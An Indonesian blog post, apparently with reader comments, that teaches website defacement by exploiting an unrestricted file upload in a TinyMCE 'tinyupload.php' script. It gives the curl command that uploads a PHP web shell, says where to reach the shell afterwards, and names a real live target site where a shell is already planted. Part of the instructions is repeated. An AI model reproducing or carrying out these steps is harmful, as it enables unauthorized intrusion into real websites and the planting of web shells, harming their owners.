tutorial deface tinyupload remote file upload(rce)
Assalamualaikum wr.wb kali saya akan memberikan tutorial deface tinyupload remote file upload.
ok pertama kalian harus install curl.kalo kalian penguna termux kalian bisa pkg install curl jika pengguna linux kalian bisa menggunakan command apt-get install php5-curl untuk pengguna windows kalian bisa cari di google :v
ok langsung aja pertama kalian cari target vuln tinyupload remote file uploadnya.dork?use your brain :v
disini saya sudah mempunyai live target.spesial thanks buat ster khunerable untuk live targetnya.live target jangan dirusak ya bang.karena banyak juga yang ingin mencobanya:v
http://smsmta.am/tinymce/tinyupload.php
-pertama kalian buka terminal atau command prompt
-ketik curl -F "tuUploadFile=@urshell.php" site.com/tinyupload.php
keterangan:
ok pertama kalian harus install curl.kalo kalian penguna termux kalian bisa pkg install curl jika pengguna linux kalian bisa menggunakan command apt-get install php5-curl untuk pengguna windows kalian bisa cari di google :v
ok langsung aja pertama kalian cari target vuln tinyupload remote file uploadnya.dork?use your brain :v
disini saya sudah mempunyai live target.spesial thanks buat ster khunerable untuk live targetnya.live target jangan dirusak ya bang.karena banyak juga yang ingin mencobanya:v
http://smsmta.am/tinymce/tinyupload.php
-pertama kalian buka terminal atau command prompt
-ketik curl -F "tuUploadFile=@urshell.php" site.com/tinyupload.php
keterangan:
urshell.php adalah shell kalian.contoh saya memiliki uploader dan namanya uphome.php nah urshell.php itu diganti dengan uphome.php
-setelah itu enter.
-trus gimana cara check shellnya?
gampang
-tinggal tambahin site.com/images/upload/urshell.php
example http://smsmta.am/images/upload/uphome.php
Dork "use your brain"
BalasHapusGw ketik gk ada anjir ��
wkwk bisa aja kamu mas
BalasHapus